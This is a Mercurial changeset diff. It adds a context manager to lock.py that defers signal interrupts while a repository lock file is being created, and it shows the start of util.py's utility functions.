##// END OF EJS Templates
lock: block signal interrupt while making a lock file...
Yuya Nishihara -
r36840:d77c3b02 default
parent child Browse files
Show More
@@ -1,329 +1,389 b''
1 # lock.py - simple advisory locking scheme for mercurial
1 # lock.py - simple advisory locking scheme for mercurial
2 #
2 #
3 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import contextlib
10 import contextlib
11 import errno
11 import errno
12 import os
12 import os
13 import signal
13 import socket
14 import socket
14 import time
15 import time
15 import warnings
16 import warnings
16
17
17 from .i18n import _
18 from .i18n import _
18
19
19 from . import (
20 from . import (
20 encoding,
21 encoding,
21 error,
22 error,
22 pycompat,
23 pycompat,
23 util,
24 util,
24 )
25 )
25
26
26 def _getlockprefix():
27 def _getlockprefix():
27 """Return a string which is used to differentiate pid namespaces
28 """Return a string which is used to differentiate pid namespaces
28
29
29 It's useful to detect "dead" processes and remove stale locks with
30 It's useful to detect "dead" processes and remove stale locks with
30 confidence. Typically it's just hostname. On modern linux, we include an
31 confidence. Typically it's just hostname. On modern linux, we include an
31 extra Linux-specific pid namespace identifier.
32 extra Linux-specific pid namespace identifier.
32 """
33 """
33 result = encoding.strtolocal(socket.gethostname())
34 result = encoding.strtolocal(socket.gethostname())
34 if pycompat.sysplatform.startswith('linux'):
35 if pycompat.sysplatform.startswith('linux'):
35 try:
36 try:
36 result += '/%x' % os.stat('/proc/self/ns/pid').st_ino
37 result += '/%x' % os.stat('/proc/self/ns/pid').st_ino
37 except OSError as ex:
38 except OSError as ex:
38 if ex.errno not in (errno.ENOENT, errno.EACCES, errno.ENOTDIR):
39 if ex.errno not in (errno.ENOENT, errno.EACCES, errno.ENOTDIR):
39 raise
40 raise
40 return result
41 return result
41
42
43 @contextlib.contextmanager
44 def _delayedinterrupt():
45 """Block signal interrupt while doing something critical
46
47 This makes sure that the code block wrapped by this context manager won't
48 be interrupted.
49
50 For Windows developers: It appears not possible to guard time.sleep()
51 from CTRL_C_EVENT, so please don't use time.sleep() to test if this is
52 working.
53 """
54 assertedsigs = []
55 blocked = False
56 orighandlers = {}
57
58 def raiseinterrupt(num):
59 if (num == getattr(signal, 'SIGINT', None) or
60 num == getattr(signal, 'CTRL_C_EVENT', None)):
61 raise KeyboardInterrupt
62 else:
63 raise error.SignalInterrupt
64 def catchterm(num, frame):
65 if blocked:
66 assertedsigs.append(num)
67 else:
68 raiseinterrupt(num)
69
70 try:
71 # save handlers first so they can be restored even if a setup is
72 # interrupted between signal.signal() and orighandlers[] =.
73 for name in ['CTRL_C_EVENT', 'SIGINT', 'SIGBREAK', 'SIGHUP', 'SIGTERM']:
74 num = getattr(signal, name, None)
75 if num and num not in orighandlers:
76 orighandlers[num] = signal.getsignal(num)
77 try:
78 for num in orighandlers:
79 signal.signal(num, catchterm)
80 except ValueError:
81 pass # in a thread? no luck
82
83 blocked = True
84 yield
85 finally:
86 # no simple way to reliably restore all signal handlers because
87 # any loops, recursive function calls, except blocks, etc. can be
88 # interrupted. so instead, make catchterm() raise interrupt.
89 blocked = False
90 try:
91 for num, handler in orighandlers.items():
92 signal.signal(num, handler)
93 except ValueError:
94 pass # in a thread?
95
96 # re-raise interrupt exception if any, which may be shadowed by a new
97 # interrupt occurring while re-raising the first one
98 if assertedsigs:
99 raiseinterrupt(assertedsigs[0])
100
42 def trylock(ui, vfs, lockname, timeout, warntimeout, *args, **kwargs):
101 def trylock(ui, vfs, lockname, timeout, warntimeout, *args, **kwargs):
43 """return an acquired lock or raise a LockHeld exception
102 """return an acquired lock or raise a LockHeld exception
44
103
45 This function is responsible for issuing warnings and/or debug messages about
104 This function is responsible for issuing warnings and/or debug messages about
46 the held lock while trying to acquire it."""
105 the held lock while trying to acquire it."""
47
106
48 def printwarning(printer, locker):
107 def printwarning(printer, locker):
49 """issue the usual "waiting on lock" message through any channel"""
108 """issue the usual "waiting on lock" message through any channel"""
50 # show more details for new-style locks
109 # show more details for new-style locks
51 if ':' in locker:
110 if ':' in locker:
52 host, pid = locker.split(":", 1)
111 host, pid = locker.split(":", 1)
53 msg = (_("waiting for lock on %s held by process %r on host %r\n")
112 msg = (_("waiting for lock on %s held by process %r on host %r\n")
54 % (pycompat.bytestr(l.desc), pycompat.bytestr(pid),
113 % (pycompat.bytestr(l.desc), pycompat.bytestr(pid),
55 pycompat.bytestr(host)))
114 pycompat.bytestr(host)))
56 else:
115 else:
57 msg = (_("waiting for lock on %s held by %r\n")
116 msg = (_("waiting for lock on %s held by %r\n")
58 % (l.desc, pycompat.bytestr(locker)))
117 % (l.desc, pycompat.bytestr(locker)))
59 printer(msg)
118 printer(msg)
60
119
61 l = lock(vfs, lockname, 0, *args, dolock=False, **kwargs)
120 l = lock(vfs, lockname, 0, *args, dolock=False, **kwargs)
62
121
63 debugidx = 0 if (warntimeout and timeout) else -1
122 debugidx = 0 if (warntimeout and timeout) else -1
64 warningidx = 0
123 warningidx = 0
65 if not timeout:
124 if not timeout:
66 warningidx = -1
125 warningidx = -1
67 elif warntimeout:
126 elif warntimeout:
68 warningidx = warntimeout
127 warningidx = warntimeout
69
128
70 delay = 0
129 delay = 0
71 while True:
130 while True:
72 try:
131 try:
73 l._trylock()
132 l._trylock()
74 break
133 break
75 except error.LockHeld as inst:
134 except error.LockHeld as inst:
76 if delay == debugidx:
135 if delay == debugidx:
77 printwarning(ui.debug, inst.locker)
136 printwarning(ui.debug, inst.locker)
78 if delay == warningidx:
137 if delay == warningidx:
79 printwarning(ui.warn, inst.locker)
138 printwarning(ui.warn, inst.locker)
80 if timeout <= delay:
139 if timeout <= delay:
81 raise error.LockHeld(errno.ETIMEDOUT, inst.filename,
140 raise error.LockHeld(errno.ETIMEDOUT, inst.filename,
82 l.desc, inst.locker)
141 l.desc, inst.locker)
83 time.sleep(1)
142 time.sleep(1)
84 delay += 1
143 delay += 1
85
144
86 l.delay = delay
145 l.delay = delay
87 if l.delay:
146 if l.delay:
88 if 0 <= warningidx <= l.delay:
147 if 0 <= warningidx <= l.delay:
89 ui.warn(_("got lock after %d seconds\n") % l.delay)
148 ui.warn(_("got lock after %d seconds\n") % l.delay)
90 else:
149 else:
91 ui.debug("got lock after %d seconds\n" % l.delay)
150 ui.debug("got lock after %d seconds\n" % l.delay)
92 if l.acquirefn:
151 if l.acquirefn:
93 l.acquirefn()
152 l.acquirefn()
94 return l
153 return l
95
154
96 class lock(object):
155 class lock(object):
97 '''An advisory lock held by one process to control access to a set
156 '''An advisory lock held by one process to control access to a set
98 of files. Non-cooperating processes or incorrectly written scripts
157 of files. Non-cooperating processes or incorrectly written scripts
99 can ignore Mercurial's locking scheme and stomp all over the
158 can ignore Mercurial's locking scheme and stomp all over the
100 repository, so don't do that.
159 repository, so don't do that.
101
160
102 Typically used via localrepository.lock() to lock the repository
161 Typically used via localrepository.lock() to lock the repository
103 store (.hg/store/) or localrepository.wlock() to lock everything
162 store (.hg/store/) or localrepository.wlock() to lock everything
104 else under .hg/.'''
163 else under .hg/.'''
105
164
106 # lock is symlink on platforms that support it, file on others.
165 # lock is symlink on platforms that support it, file on others.
107
166
108 # symlink is used because create of directory entry and contents
167 # symlink is used because create of directory entry and contents
109 # are atomic even over nfs.
168 # are atomic even over nfs.
110
169
111 # old-style lock: symlink to pid
170 # old-style lock: symlink to pid
112 # new-style lock: symlink to hostname:pid
171 # new-style lock: symlink to hostname:pid
113
172
114 _host = None
173 _host = None
115
174
116 def __init__(self, vfs, file, timeout=-1, releasefn=None, acquirefn=None,
175 def __init__(self, vfs, file, timeout=-1, releasefn=None, acquirefn=None,
117 desc=None, inheritchecker=None, parentlock=None,
176 desc=None, inheritchecker=None, parentlock=None,
118 dolock=True):
177 dolock=True):
119 self.vfs = vfs
178 self.vfs = vfs
120 self.f = file
179 self.f = file
121 self.held = 0
180 self.held = 0
122 self.timeout = timeout
181 self.timeout = timeout
123 self.releasefn = releasefn
182 self.releasefn = releasefn
124 self.acquirefn = acquirefn
183 self.acquirefn = acquirefn
125 self.desc = desc
184 self.desc = desc
126 self._inheritchecker = inheritchecker
185 self._inheritchecker = inheritchecker
127 self.parentlock = parentlock
186 self.parentlock = parentlock
128 self._parentheld = False
187 self._parentheld = False
129 self._inherited = False
188 self._inherited = False
130 self.postrelease = []
189 self.postrelease = []
131 self.pid = self._getpid()
190 self.pid = self._getpid()
132 if dolock:
191 if dolock:
133 self.delay = self.lock()
192 self.delay = self.lock()
134 if self.acquirefn:
193 if self.acquirefn:
135 self.acquirefn()
194 self.acquirefn()
136
195
137 def __enter__(self):
196 def __enter__(self):
138 return self
197 return self
139
198
140 def __exit__(self, exc_type, exc_value, exc_tb):
199 def __exit__(self, exc_type, exc_value, exc_tb):
141 self.release()
200 self.release()
142
201
143 def __del__(self):
202 def __del__(self):
144 if self.held:
203 if self.held:
145 warnings.warn("use lock.release instead of del lock",
204 warnings.warn("use lock.release instead of del lock",
146 category=DeprecationWarning,
205 category=DeprecationWarning,
147 stacklevel=2)
206 stacklevel=2)
148
207
149 # ensure the lock will be removed
208 # ensure the lock will be removed
150 # even if recursive locking did occur
209 # even if recursive locking did occur
151 self.held = 1
210 self.held = 1
152
211
153 self.release()
212 self.release()
154
213
155 def _getpid(self):
214 def _getpid(self):
156 # wrapper around util.getpid() to make testing easier
215 # wrapper around util.getpid() to make testing easier
157 return util.getpid()
216 return util.getpid()
158
217
159 def lock(self):
218 def lock(self):
160 timeout = self.timeout
219 timeout = self.timeout
161 while True:
220 while True:
162 try:
221 try:
163 self._trylock()
222 self._trylock()
164 return self.timeout - timeout
223 return self.timeout - timeout
165 except error.LockHeld as inst:
224 except error.LockHeld as inst:
166 if timeout != 0:
225 if timeout != 0:
167 time.sleep(1)
226 time.sleep(1)
168 if timeout > 0:
227 if timeout > 0:
169 timeout -= 1
228 timeout -= 1
170 continue
229 continue
171 raise error.LockHeld(errno.ETIMEDOUT, inst.filename, self.desc,
230 raise error.LockHeld(errno.ETIMEDOUT, inst.filename, self.desc,
172 inst.locker)
231 inst.locker)
173
232
174 def _trylock(self):
233 def _trylock(self):
175 if self.held:
234 if self.held:
176 self.held += 1
235 self.held += 1
177 return
236 return
178 if lock._host is None:
237 if lock._host is None:
179 lock._host = _getlockprefix()
238 lock._host = _getlockprefix()
180 lockname = '%s:%d' % (lock._host, self.pid)
239 lockname = '%s:%d' % (lock._host, self.pid)
181 retry = 5
240 retry = 5
182 while not self.held and retry:
241 while not self.held and retry:
183 retry -= 1
242 retry -= 1
184 try:
243 try:
244 with _delayedinterrupt():
185 self.vfs.makelock(lockname, self.f)
245 self.vfs.makelock(lockname, self.f)
186 self.held = 1
246 self.held = 1
187 except (OSError, IOError) as why:
247 except (OSError, IOError) as why:
188 if why.errno == errno.EEXIST:
248 if why.errno == errno.EEXIST:
189 locker = self._readlock()
249 locker = self._readlock()
190 if locker is None:
250 if locker is None:
191 continue
251 continue
192
252
193 # special case where a parent process holds the lock -- this
253 # special case where a parent process holds the lock -- this
194 # is different from the pid being different because we do
254 # is different from the pid being different because we do
195 # want the unlock and postrelease functions to be called,
255 # want the unlock and postrelease functions to be called,
196 # but the lockfile to not be removed.
256 # but the lockfile to not be removed.
197 if locker == self.parentlock:
257 if locker == self.parentlock:
198 self._parentheld = True
258 self._parentheld = True
199 self.held = 1
259 self.held = 1
200 return
260 return
201 locker = self._testlock(locker)
261 locker = self._testlock(locker)
202 if locker is not None:
262 if locker is not None:
203 raise error.LockHeld(errno.EAGAIN,
263 raise error.LockHeld(errno.EAGAIN,
204 self.vfs.join(self.f), self.desc,
264 self.vfs.join(self.f), self.desc,
205 locker)
265 locker)
206 else:
266 else:
207 raise error.LockUnavailable(why.errno, why.strerror,
267 raise error.LockUnavailable(why.errno, why.strerror,
208 why.filename, self.desc)
268 why.filename, self.desc)
209
269
210 if not self.held:
270 if not self.held:
211 # use empty locker to mean "busy for frequent lock/unlock
271 # use empty locker to mean "busy for frequent lock/unlock
212 # by many processes"
272 # by many processes"
213 raise error.LockHeld(errno.EAGAIN,
273 raise error.LockHeld(errno.EAGAIN,
214 self.vfs.join(self.f), self.desc, "")
274 self.vfs.join(self.f), self.desc, "")
215
275
216 def _readlock(self):
276 def _readlock(self):
217 """read lock and return its value
277 """read lock and return its value
218
278
219 Returns None if no lock exists, pid for old-style locks, and host:pid
279 Returns None if no lock exists, pid for old-style locks, and host:pid
220 for new-style locks.
280 for new-style locks.
221 """
281 """
222 try:
282 try:
223 return self.vfs.readlock(self.f)
283 return self.vfs.readlock(self.f)
224 except (OSError, IOError) as why:
284 except (OSError, IOError) as why:
225 if why.errno == errno.ENOENT:
285 if why.errno == errno.ENOENT:
226 return None
286 return None
227 raise
287 raise
228
288
229 def _testlock(self, locker):
289 def _testlock(self, locker):
230 if locker is None:
290 if locker is None:
231 return None
291 return None
232 try:
292 try:
233 host, pid = locker.split(":", 1)
293 host, pid = locker.split(":", 1)
234 except ValueError:
294 except ValueError:
235 return locker
295 return locker
236 if host != lock._host:
296 if host != lock._host:
237 return locker
297 return locker
238 try:
298 try:
239 pid = int(pid)
299 pid = int(pid)
240 except ValueError:
300 except ValueError:
241 return locker
301 return locker
242 if util.testpid(pid):
302 if util.testpid(pid):
243 return locker
303 return locker
244 # if locker dead, break lock. must do this with another lock
304 # if locker dead, break lock. must do this with another lock
245 # held, or can race and break valid lock.
305 # held, or can race and break valid lock.
246 try:
306 try:
247 l = lock(self.vfs, self.f + '.break', timeout=0)
307 l = lock(self.vfs, self.f + '.break', timeout=0)
248 self.vfs.unlink(self.f)
308 self.vfs.unlink(self.f)
249 l.release()
309 l.release()
250 except error.LockError:
310 except error.LockError:
251 return locker
311 return locker
252
312
253 def testlock(self):
313 def testlock(self):
254 """return id of locker if lock is valid, else None.
314 """return id of locker if lock is valid, else None.
255
315
256 If old-style lock, we cannot tell what machine locker is on.
316 If old-style lock, we cannot tell what machine locker is on.
257 with new-style lock, if locker is on this machine, we can
317 with new-style lock, if locker is on this machine, we can
258 see if locker is alive. If locker is on this machine but
318 see if locker is alive. If locker is on this machine but
259 not alive, we can safely break lock.
319 not alive, we can safely break lock.
260
320
261 The lock file is only deleted when None is returned.
321 The lock file is only deleted when None is returned.
262
322
263 """
323 """
264 locker = self._readlock()
324 locker = self._readlock()
265 return self._testlock(locker)
325 return self._testlock(locker)
266
326
267 @contextlib.contextmanager
327 @contextlib.contextmanager
268 def inherit(self):
328 def inherit(self):
269 """context for the lock to be inherited by a Mercurial subprocess.
329 """context for the lock to be inherited by a Mercurial subprocess.
270
330
271 Yields a string that will be recognized by the lock in the subprocess.
331 Yields a string that will be recognized by the lock in the subprocess.
272 Communicating this string to the subprocess needs to be done separately
332 Communicating this string to the subprocess needs to be done separately
273 -- typically by an environment variable.
333 -- typically by an environment variable.
274 """
334 """
275 if not self.held:
335 if not self.held:
276 raise error.LockInheritanceContractViolation(
336 raise error.LockInheritanceContractViolation(
277 'inherit can only be called while lock is held')
337 'inherit can only be called while lock is held')
278 if self._inherited:
338 if self._inherited:
279 raise error.LockInheritanceContractViolation(
339 raise error.LockInheritanceContractViolation(
280 'inherit cannot be called while lock is already inherited')
340 'inherit cannot be called while lock is already inherited')
281 if self._inheritchecker is not None:
341 if self._inheritchecker is not None:
282 self._inheritchecker()
342 self._inheritchecker()
283 if self.releasefn:
343 if self.releasefn:
284 self.releasefn()
344 self.releasefn()
285 if self._parentheld:
345 if self._parentheld:
286 lockname = self.parentlock
346 lockname = self.parentlock
287 else:
347 else:
288 lockname = '%s:%s' % (lock._host, self.pid)
348 lockname = '%s:%s' % (lock._host, self.pid)
289 self._inherited = True
349 self._inherited = True
290 try:
350 try:
291 yield lockname
351 yield lockname
292 finally:
352 finally:
293 if self.acquirefn:
353 if self.acquirefn:
294 self.acquirefn()
354 self.acquirefn()
295 self._inherited = False
355 self._inherited = False
296
356
297 def release(self):
357 def release(self):
298 """release the lock and execute callback function if any
358 """release the lock and execute callback function if any
299
359
300 If the lock has been acquired multiple times, the actual release is
360 If the lock has been acquired multiple times, the actual release is
301 delayed to the last release call."""
361 delayed to the last release call."""
302 if self.held > 1:
362 if self.held > 1:
303 self.held -= 1
363 self.held -= 1
304 elif self.held == 1:
364 elif self.held == 1:
305 self.held = 0
365 self.held = 0
306 if self._getpid() != self.pid:
366 if self._getpid() != self.pid:
307 # we forked, and are not the parent
367 # we forked, and are not the parent
308 return
368 return
309 try:
369 try:
310 if self.releasefn:
370 if self.releasefn:
311 self.releasefn()
371 self.releasefn()
312 finally:
372 finally:
313 if not self._parentheld:
373 if not self._parentheld:
314 try:
374 try:
315 self.vfs.unlink(self.f)
375 self.vfs.unlink(self.f)
316 except OSError:
376 except OSError:
317 pass
377 pass
318 # The postrelease functions typically assume the lock is not held
378 # The postrelease functions typically assume the lock is not held
319 # at all.
379 # at all.
320 if not self._parentheld:
380 if not self._parentheld:
321 for callback in self.postrelease:
381 for callback in self.postrelease:
322 callback()
382 callback()
323 # Prevent double usage and help clear cycles.
383 # Prevent double usage and help clear cycles.
324 self.postrelease = None
384 self.postrelease = None
325
385
326 def release(*locks):
386 def release(*locks):
327 for lock in locks:
387 for lock in locks:
328 if lock is not None:
388 if lock is not None:
329 lock.release()
389 lock.release()
@@ -1,4061 +1,4066 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import contextlib
22 import contextlib
23 import errno
23 import errno
24 import gc
24 import gc
25 import hashlib
25 import hashlib
26 import imp
26 import imp
27 import io
27 import io
28 import itertools
28 import itertools
29 import mmap
29 import mmap
30 import os
30 import os
31 import platform as pyplatform
31 import platform as pyplatform
32 import re as remod
32 import re as remod
33 import shutil
33 import shutil
34 import signal
34 import signal
35 import socket
35 import socket
36 import stat
36 import stat
37 import string
37 import string
38 import subprocess
38 import subprocess
39 import sys
39 import sys
40 import tempfile
40 import tempfile
41 import textwrap
41 import textwrap
42 import time
42 import time
43 import traceback
43 import traceback
44 import warnings
44 import warnings
45 import zlib
45 import zlib
46
46
47 from . import (
47 from . import (
48 encoding,
48 encoding,
49 error,
49 error,
50 i18n,
50 i18n,
51 node as nodemod,
51 node as nodemod,
52 policy,
52 policy,
53 pycompat,
53 pycompat,
54 urllibcompat,
54 urllibcompat,
55 )
55 )
56 from .utils import dateutil
56 from .utils import dateutil
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 stringio = pycompat.stringio
74 stringio = pycompat.stringio
75 xmlrpclib = pycompat.xmlrpclib
75 xmlrpclib = pycompat.xmlrpclib
76
76
77 httpserver = urllibcompat.httpserver
77 httpserver = urllibcompat.httpserver
78 urlerr = urllibcompat.urlerr
78 urlerr = urllibcompat.urlerr
79 urlreq = urllibcompat.urlreq
79 urlreq = urllibcompat.urlreq
80
80
81 # workaround for win32mbcs
81 # workaround for win32mbcs
82 _filenamebytestr = pycompat.bytestr
82 _filenamebytestr = pycompat.bytestr
83
83
84 def isatty(fp):
84 def isatty(fp):
85 try:
85 try:
86 return fp.isatty()
86 return fp.isatty()
87 except AttributeError:
87 except AttributeError:
88 return False
88 return False
89
89
90 # glibc determines buffering on first write to stdout - if we replace a TTY
90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 # buffering
92 # buffering
93 if isatty(stdout):
93 if isatty(stdout):
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95
95
96 if pycompat.iswindows:
96 if pycompat.iswindows:
97 from . import windows as platform
97 from . import windows as platform
98 stdout = platform.winstdout(stdout)
98 stdout = platform.winstdout(stdout)
99 else:
99 else:
100 from . import posix as platform
100 from . import posix as platform
101
101
102 _ = i18n._
102 _ = i18n._
103
103
104 bindunixsocket = platform.bindunixsocket
104 bindunixsocket = platform.bindunixsocket
105 cachestat = platform.cachestat
105 cachestat = platform.cachestat
106 checkexec = platform.checkexec
106 checkexec = platform.checkexec
107 checklink = platform.checklink
107 checklink = platform.checklink
108 copymode = platform.copymode
108 copymode = platform.copymode
109 executablepath = platform.executablepath
109 executablepath = platform.executablepath
110 expandglobs = platform.expandglobs
110 expandglobs = platform.expandglobs
111 explainexit = platform.explainexit
111 explainexit = platform.explainexit
112 findexe = platform.findexe
112 findexe = platform.findexe
113 getfsmountpoint = platform.getfsmountpoint
113 getfsmountpoint = platform.getfsmountpoint
114 getfstype = platform.getfstype
114 getfstype = platform.getfstype
115 gethgcmd = platform.gethgcmd
115 gethgcmd = platform.gethgcmd
116 getuser = platform.getuser
116 getuser = platform.getuser
117 getpid = os.getpid
117 getpid = os.getpid
118 groupmembers = platform.groupmembers
118 groupmembers = platform.groupmembers
119 groupname = platform.groupname
119 groupname = platform.groupname
120 hidewindow = platform.hidewindow
120 hidewindow = platform.hidewindow
121 isexec = platform.isexec
121 isexec = platform.isexec
122 isowner = platform.isowner
122 isowner = platform.isowner
123 listdir = osutil.listdir
123 listdir = osutil.listdir
124 localpath = platform.localpath
124 localpath = platform.localpath
125 lookupreg = platform.lookupreg
125 lookupreg = platform.lookupreg
126 makedir = platform.makedir
126 makedir = platform.makedir
127 nlinks = platform.nlinks
127 nlinks = platform.nlinks
128 normpath = platform.normpath
128 normpath = platform.normpath
129 normcase = platform.normcase
129 normcase = platform.normcase
130 normcasespec = platform.normcasespec
130 normcasespec = platform.normcasespec
131 normcasefallback = platform.normcasefallback
131 normcasefallback = platform.normcasefallback
132 openhardlinks = platform.openhardlinks
132 openhardlinks = platform.openhardlinks
133 oslink = platform.oslink
133 oslink = platform.oslink
134 parsepatchoutput = platform.parsepatchoutput
134 parsepatchoutput = platform.parsepatchoutput
135 pconvert = platform.pconvert
135 pconvert = platform.pconvert
136 poll = platform.poll
136 poll = platform.poll
137 popen = platform.popen
137 popen = platform.popen
138 posixfile = platform.posixfile
138 posixfile = platform.posixfile
139 quotecommand = platform.quotecommand
139 quotecommand = platform.quotecommand
140 readpipe = platform.readpipe
140 readpipe = platform.readpipe
141 rename = platform.rename
141 rename = platform.rename
142 removedirs = platform.removedirs
142 removedirs = platform.removedirs
143 samedevice = platform.samedevice
143 samedevice = platform.samedevice
144 samefile = platform.samefile
144 samefile = platform.samefile
145 samestat = platform.samestat
145 samestat = platform.samestat
146 setbinary = platform.setbinary
146 setbinary = platform.setbinary
147 setflags = platform.setflags
147 setflags = platform.setflags
148 setsignalhandler = platform.setsignalhandler
148 setsignalhandler = platform.setsignalhandler
149 shellquote = platform.shellquote
149 shellquote = platform.shellquote
150 shellsplit = platform.shellsplit
150 shellsplit = platform.shellsplit
151 spawndetached = platform.spawndetached
151 spawndetached = platform.spawndetached
152 split = platform.split
152 split = platform.split
153 sshargs = platform.sshargs
153 sshargs = platform.sshargs
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statisexec = platform.statisexec
155 statisexec = platform.statisexec
156 statislink = platform.statislink
156 statislink = platform.statislink
157 testpid = platform.testpid
157 testpid = platform.testpid
158 umask = platform.umask
158 umask = platform.umask
159 unlink = platform.unlink
159 unlink = platform.unlink
160 username = platform.username
160 username = platform.username
161
161
162 try:
162 try:
163 recvfds = osutil.recvfds
163 recvfds = osutil.recvfds
164 except AttributeError:
164 except AttributeError:
165 pass
165 pass
166 try:
166 try:
167 setprocname = osutil.setprocname
167 setprocname = osutil.setprocname
168 except AttributeError:
168 except AttributeError:
169 pass
169 pass
170 try:
170 try:
171 unblocksignal = osutil.unblocksignal
171 unblocksignal = osutil.unblocksignal
172 except AttributeError:
172 except AttributeError:
173 pass
173 pass
174
174
175 # Python compatibility
175 # Python compatibility
176
176
177 _notset = object()
177 _notset = object()
178
178
179 # disable Python's problematic floating point timestamps (issue4836)
179 # disable Python's problematic floating point timestamps (issue4836)
180 # (Python hypocritically says you shouldn't change this behavior in
180 # (Python hypocritically says you shouldn't change this behavior in
181 # libraries, and sure enough Mercurial is not a library.)
181 # libraries, and sure enough Mercurial is not a library.)
182 os.stat_float_times(False)
182 os.stat_float_times(False)
183
183
184 def safehasattr(thing, attr):
184 def safehasattr(thing, attr):
185 return getattr(thing, attr, _notset) is not _notset
185 return getattr(thing, attr, _notset) is not _notset
186
186
187 def _rapply(f, xs):
187 def _rapply(f, xs):
188 if xs is None:
188 if xs is None:
189 # assume None means non-value of optional data
189 # assume None means non-value of optional data
190 return xs
190 return xs
191 if isinstance(xs, (list, set, tuple)):
191 if isinstance(xs, (list, set, tuple)):
192 return type(xs)(_rapply(f, x) for x in xs)
192 return type(xs)(_rapply(f, x) for x in xs)
193 if isinstance(xs, dict):
193 if isinstance(xs, dict):
194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 return f(xs)
195 return f(xs)
196
196
def rapply(f, xs):
    """Apply function recursively to every item preserving the data structure

    >>> def f(x):
    ...     return 'f(%s)' % x
    >>> rapply(f, None) is None
    True
    >>> rapply(f, 'a')
    'f(a)'
    >>> rapply(f, {'a'}) == {'f(a)'}
    True
    >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
    ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]

    >>> xs = [object()]
    >>> rapply(pycompat.identity, xs) is xs
    True
    """
    if f is pycompat.identity:
        # fast path mainly for py2
        return xs
    return _rapply(f, xs)
219
219
def bytesinput(fin, fout, *args, **kwargs):
    """Prompt for input via rawinput(), reading from fin and writing to fout.

    Temporarily swaps sys.stdin/stdout for native-string wrappers around the
    given streams, then restores the originals even if rawinput() raises.
    Returns the entered line as local-encoded bytes.
    """
    sin, sout = sys.stdin, sys.stdout
    try:
        sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
        return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
    finally:
        sys.stdin, sys.stdout = sin, sout
227
227
def bitsfrom(container):
    """Return the bitwise OR of all flags in `container` (0 when empty)."""
    bits = 0
    for bit in container:
        bits |= bit
    return bits
233
233
# python 2.6 still have deprecation warning enabled by default. We do not want
# to display anything to standard user so detect if we are running test and
# only use python deprecation warning in this case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')
254
254
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.

    `version` is the Mercurial release after which compatibility will be
    dropped; `stacklevel` is bumped by one so the warning points at the
    caller of this helper rather than the helper itself.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
264
264
